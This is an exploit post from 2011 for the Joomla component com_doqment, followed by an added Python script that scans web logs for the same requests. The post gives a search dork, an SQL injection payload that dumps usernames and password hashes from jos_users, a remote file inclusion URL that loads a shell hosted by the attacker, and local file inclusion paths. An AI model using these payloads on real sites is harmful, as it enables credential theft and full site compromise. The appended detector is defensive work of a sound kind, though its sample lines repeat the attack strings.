Monday, 14 March 2011

Joomla Doqment SQL Injection / LFI / RFI

Go0gle Dork : " inurl:com_doqment "
#==============>>>>> Exploit (1) SQL Injection %100 <<<<<=======================#
> DzSQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--

> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ DzSQL Here ] !

#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell : http://[Your-Space]/Sh311.php

> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path=

> ExplO!t : http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
 
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#

> ExplO!t : http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]
>           http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]
>           http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]
>           http://[Target]/[Path]/components/com_doqment/files/?=[LFI]
>           http://[Target]/[Path]/components/com_doqment/file/?=[LFI]
 
Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
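
A defender-side check for the three request shapes listed above, run over web-server request lines. This is an added example, not part of the original post: `classify`, `scan`, the finding labels and every sample log line are constructed here for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed request lines in the shapes the post lists; hosts and values are made up.
SAMPLE_LOG = [
    "GET /index.php?option=com_doqment&cid=5 HTTP/1.1",
    "GET /index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,3/**/from/**/jos_users-- HTTP/1.1",
    "GET /index.php?option=com_doqment&cid=admin.ponygallery.html.php?mosConfig_absolute_path==http://host.example.invalid/f.php HTTP/1.1",
    "GET /site/components/com_doqment/documents/?=..%2F..%2Fplaceholder HTTP/1.1",
    "GET /index.php?option=com_content&id=7 HTTP/1.1",
]

SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
TRAVERSAL = re.compile(r"\.\.[/\\]")

def classify(request_line):
    """Return a sorted list of findings for one 'METHOD URL PROTOCOL' line."""
    if request_line.count(" ") < 2:
        return []
    # Take everything between method and protocol, so a URL with literal spaces still parses.
    url = request_line.split(" ", 1)[1].rsplit(" ", 1)[0]
    parts = urlsplit(url)
    path = unquote(parts.path).lower()
    query = unquote(parts.query.replace("+", " "))
    direct = "/components/com_doqment/" in path
    routed = re.search(r"(?:^|&)option=com_doqment(?:&|$)", query, re.I)
    if not (direct or routed):
        return []
    findings = set()
    # Inline comments stand in for spaces in the post's payload; normalise them first.
    if UNION_SELECT.search(SQL_COMMENT.sub(" ", query)):
        findings.add("sqli")
    # Searched in the whole query: in the post's URL shape the name sits
    # inside the cid value, so a per-key lookup would miss it.
    if "mosconfig_absolute_path" in query.lower():
        findings.add("rfi")
    if direct and TRAVERSAL.search(query):
        findings.add("lfi")
    return sorted(findings)

def scan(lines):
    """Map each flagged request line to its findings."""
    return {line: hits for line in lines if (hits := classify(line))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG).items():
        print(",".join(hits), line)
```

Matching on the decoded query after stripping SQL comments catches the `/**/` spacing used in the post; a hit means the request deserves review, not that the component was exploited.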


 